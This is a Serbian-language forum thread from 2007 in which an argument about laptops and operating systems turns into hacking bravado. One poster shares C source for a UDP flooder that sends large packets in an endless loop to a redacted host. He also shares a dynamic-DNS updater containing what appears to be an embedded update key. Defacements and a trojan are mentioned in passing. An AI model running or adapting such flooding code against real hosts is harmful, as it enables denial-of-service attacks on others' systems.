Highl1 Posted April 20, 2007 Report Share Posted April 20, 2007 Statore ti si na prosloj strani uporedjivao MacBook i prvi laptop koji ima ultra low voltage proc koji ide u 12" modele i koshta sam ogromne pare, tu se zavrshio ovaj razgovor sa tobom o laptopovima :) Quote 03:34 ( MiGsa ) da budem iskren03:35 ( MiGsa ) nagledao sam se ovde vishe kurcheva nego pichki 22:05 (Ivan_tm) Ozbiljno, tvoj i Cokin sam upamtio odmah 13:43 ( darko ) ja sam puco iz njegove vazdushare [16:42:19] Miša says: pojavio mi se patrijarh pavle u ppl u may know [21:00] <vudu> jebacemo svi Link to comment Share on other sites More sharing options...
Stator Posted April 20, 2007 Report Share Posted April 20, 2007 To je bio extrmni primer da mac nije naskluplji nego da ima i gorih. Uveo sam u istom postu i lenovo. Quote Link to comment Share on other sites More sharing options...
Highl1 Posted April 20, 2007 Report Share Posted April 20, 2007 Kakav extremni primer kad poredish babe i zhabe, dve razlichite serije procesora.. Quote 03:34 ( MiGsa ) da budem iskren03:35 ( MiGsa ) nagledao sam se ovde vishe kurcheva nego pichki 22:05 (Ivan_tm) Ozbiljno, tvoj i Cokin sam upamtio odmah 13:43 ( darko ) ja sam puco iz njegove vazdushare [16:42:19] Miša says: pojavio mi se patrijarh pavle u ppl u may know [21:00] <vudu> jebacemo svi Link to comment Share on other sites More sharing options...
f4ts0 Posted April 20, 2007 Report Share Posted April 20, 2007 Lol Marinice odstampaj ove postove i odnesi profanu, ima da se udari tikvom u glavu. Quote You may have gone to Cambridge, but I'm an honorary graduate of Starfleet Academy Link to comment Share on other sites More sharing options...
De1Rekt0n Posted April 20, 2007 Report Share Posted April 20, 2007 Ne zna se ko je veci strucnjak Quote Link to comment Share on other sites More sharing options...
f4ts0 Posted April 20, 2007 Report Share Posted April 20, 2007 Pa za tjebeta vudua statora sa1nta bar znamo. Daj nesto tvoje sto je jace od difejsovanja nekog decjeg foruma. A za haljija smo svi tatamate Quote You may have gone to Cambridge, but I'm an honorary graduate of Starfleet Academy Link to comment Share on other sites More sharing options...
Junkie Posted April 20, 2007 Report Share Posted April 20, 2007 jel smem da dodam da je ovo prvi topic gde su se de1 i mohi slozili oko necega ... ocekujte zabe veceras Quote Link to comment Share on other sites More sharing options...
iguana Posted April 20, 2007 Report Share Posted April 20, 2007 kako ste kul kada se raspravljate koji je operativni sistem bolj, kao da se od os-a zapravo zhivi i sa njim moze nesto uraditi osim sloziti pasijans, pogledati web i napisati txt fajl. Quote It's nice to be good, but it's nothing compared to being bad Link to comment Share on other sites More sharing options...
Mitch Posted April 20, 2007 Report Share Posted April 20, 2007 mogu da se gledaju i filmovi! Quote Bjukenon Mitch Link to comment Share on other sites More sharing options...
iguana Posted April 20, 2007 Report Share Posted April 20, 2007 e da, izvini. i da se igraju minice i da se trejsuje server takodje. sada veliki broj mainstream aplikacija postoji za barem dva osa, a ako ne postoji jedna aplikacija na oba osa onda postoji njen pandan, mada sada svaka kompanija koja drzi do sebe ima cross system aplikacije Quote It's nice to be good, but it's nothing compared to being bad Link to comment Share on other sites More sharing options...
mncu Posted April 20, 2007 Author Report Share Posted April 20, 2007 Ne zna se ko je veci strucnjak ti si najveci \o/ btw imala sam danas kont i sve sam odradila... i usrali ste mi topik :/ Quote Link to comment Share on other sites More sharing options...
mohican Posted April 20, 2007 Report Share Posted April 20, 2007 kako ste kul kada se raspravljate koji je operativni sistem bolj, kao da se od os-a zapravo zhivi i sa njim moze nesto uraditi osim sloziti pasijans, pogledati web i napisati txt fajl. Nabroj kolko os-eva znas? ... Lol aj pricaj jos malo o necemu o cemu pojma nemas. Postoje usko specializovani os-evi koji rade samo ono za sta su napravljeni. Pritom i neki od ovih za koje cak i znas mogu da rade shtoshta sami od sebe bez dodatnih aplikacija. Quote OPTIMISED FOR HUMAN OPTICAL NERVEBEST VIEWED WITH A MONITOR Link to comment Share on other sites More sharing options...
De1Rekt0n Posted April 20, 2007 Report Share Posted April 20, 2007 (edited) Pa za tjebeta vudua statora sa1nta bar znamo. Daj nesto tvoje sto je jace od difejsovanja nekog decjeg foruma. A za haljija smo svi tatamate Evo ti nesto sto sam pisao pre par godina, sam ces provaliti zasta :D Imam neki trojanac u ASMu ali mi ne pada napamet da dajem source :) #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> #include <sys/wait.h> #include <time.h> int main(int argc, char *argv[]) { time_t now; struct tm *l_time; char dan[20]; char sat[20]; int sockfd; int i, buf_size; char buf[50000]; struct sockaddr_in their_addr; struct hostent *he; int numbytes; buf_size = 40480; if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) { perror("socket"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(3545); their_addr.sin_addr.s_addr = inet_addr("************"); bzero(&(their_addr.sin_zero), 8); while (1) { time(&now); l_time = localtime(&now); strftime(dan, sizeof dan, "%A", l_time); strftime(sat, sizeof sat, "%H", l_time); if (strcmp(dan,"Monday")==0) { if (strcmp(sat,"05")==0) { return 0; } } sendto(sockfd, buf, buf_size, 0, \ (struct sockaddr *)&their_addr, sizeof(struct sockaddr)); } close(sockfd); return 0; } Edited April 20, 2007 by De1 Quote Link to comment Share on other sites More sharing options...
Sa1Nt Posted April 20, 2007 Report Share Posted April 20, 2007 :O Quote Link to comment Share on other sites More sharing options...
f4ts0 Posted April 20, 2007 Report Share Posted April 20, 2007 nemam ja pojma sta ti je ono, programiranje me ne zanima ni najmanje Quote You may have gone to Cambridge, but I'm an honorary graduate of Starfleet Academy Link to comment Share on other sites More sharing options...
dzontra.volta Posted April 20, 2007 Report Share Posted April 20, 2007 pa to je jace od difejsovanja nekog decijeg foruma trazio si jbt Quote Link to comment Share on other sites More sharing options...
f4ts0 Posted April 21, 2007 Report Share Posted April 21, 2007 Gabana, rece meni de1 :"Evo ti nesto sto sam pisao pre par godina, sam ces provaliti zasta :D" A ja stvarno nemam pojma sta je, neki kalendar/adresar, jbm li ga Quote You may have gone to Cambridge, but I'm an honorary graduate of Starfleet Academy Link to comment Share on other sites More sharing options...
De1Rekt0n Posted April 21, 2007 Report Share Posted April 21, 2007 (edited) Gabana, rece meni de1 :"Evo ti nesto sto sam pisao pre par godina, sam ces provaliti zasta :D" A ja stvarno nemam pojma sta je, neki kalendar/adresar, jbm li ga Hahaha pa dobro, polako networking programiranje dolazi kasnije :) Evo ti nesto na istu temu da proucis: #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <strings.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> int send_text(int s, char *txt) { send(s, txt, strlen(txt), MSG_NOSIGNAL); return 0; } int osvezi_ip() { char temp[256]; char *tmp; int s,rdd; struct sockaddr_in _addr; s = socket(AF_INET, SOCK_STREAM, 0); _addr.sin_family = AF_INET; _addr.sin_port = htons(80); _addr.sin_addr.s_addr = inet_addr("**********"); bzero(&(_addr.sin_zero), 8); if (connect(s, (struct sockaddr *)&_addr, sizeof(struct sockaddr)) == -1) return 0; send_text(s,"GET /dynamic/update.php?UWQyQU9rVmRMUG9BQVB4ckZVTTo2NzM0NDM= HTTP/1.1\r\n"); send_text(s,"Host: freedns.afraid.org\r\n"); send_text(s,"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0\r\n"); send_text(s,"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"); send_text(s,"Accept-Language: en-us,en;q=0.5\r\n"); send_text(s,"Keep-Alive: 30\r\n"); send_text(s,"Connection: close\r\n\r\n"); do { rdd = recv(s, temp, 250, MSG_NOSIGNAL); // if (rdd) printf(temp); } while (rdd); sleep(0.2); close(s); return 1; } int main() { int r; for (r=0;r<10;r++) { sleep(5); osvezi_ip(); } return 0; } Edited April 21, 2007 by De1 Quote Link to comment Share on other sites More sharing options...
mohican Posted April 21, 2007 Report Share Posted April 21, 2007 Prvi salje poruku "buf", koja se pritom nigde ne puni, na socket i gasi se u ponedeljak u 5 ujutru, a drugi osvezhava ip na dyndns sajtu posetjivanjem web adrese. WEOW ... al mi je drago da si impresionirao dakija, to dosta govori o njegovom faxu. I na stranu toga svega mnogo aljkavo pishesh ... Quote OPTIMISED FOR HUMAN OPTICAL NERVEBEST VIEWED WITH A MONITOR Link to comment Share on other sites More sharing options...
f4ts0 Posted April 21, 2007 Report Share Posted April 21, 2007 ma batice moje for i=1 to 10 for j=1 to 10 plot i,j next j next i Eto rasprave na ovom topiku :) Quote You may have gone to Cambridge, but I'm an honorary graduate of Starfleet Academy Link to comment Share on other sites More sharing options...
rev Posted April 21, 2007 Report Share Posted April 21, 2007 nemojte tako, ipak je dei black hat hax0r :))) imaju i majce i sve :))) Quote Link to comment Share on other sites More sharing options...
dzontra.volta Posted April 21, 2007 Report Share Posted April 21, 2007 mohi, mi smo tek kod pokazivaca, tek mi se zavrsio prvi semestar... i ja sam rekao da je bolje od difejsa nisam rekao da je impresionantno. i da, TVOJ FAX JE BOLJI !!! Quote Link to comment Share on other sites More sharing options...
mohican Posted April 21, 2007 Report Share Posted April 21, 2007 mohi, mi smo tek kod pokazivaca, tek mi se zavrsio prvi semestar... i ja sam rekao da je bolje od difejsa nisam rekao da je impresionantno. i da, TVOJ FAX JE BOLJI !!! Konkretno moj fax sto se tice programiranja i jeste bolji tj moj bivshi fax koga sam zavrshio vishe nego ti svoj. Fon se inace smatra najboljim faxem za programiranje kod nas ROFL MJAU tako da tolko o nasim falkutetima. Druga stvar. Ovo gore nije bolje od difejsa jer po kiddie skripting terminom se smatra klinac koji uzme xploit sa neta malo ga koriguje za svoj sistem i onda gleda sta sve sa njim moze da difejsuje. Stoga ovo gore nije nista bolje od script kiddie-a tj difejsovanja random sajtova posto je i ovo gore neciji kod malkice editovan. Quote OPTIMISED FOR HUMAN OPTICAL NERVEBEST VIEWED WITH A MONITOR Link to comment Share on other sites More sharing options...
voodoo_ Posted April 21, 2007 Report Share Posted April 21, 2007 Jao mohi ne lupaj, jel zna Quote Link to comment Share on other sites More sharing options...
~JungleBoY~ Posted April 21, 2007 Report Share Posted April 21, 2007 Ne daj nas, trudu, jebes ove "priuchene programere" ( Quote :-) Link to comment Share on other sites More sharing options...
Recommended Posts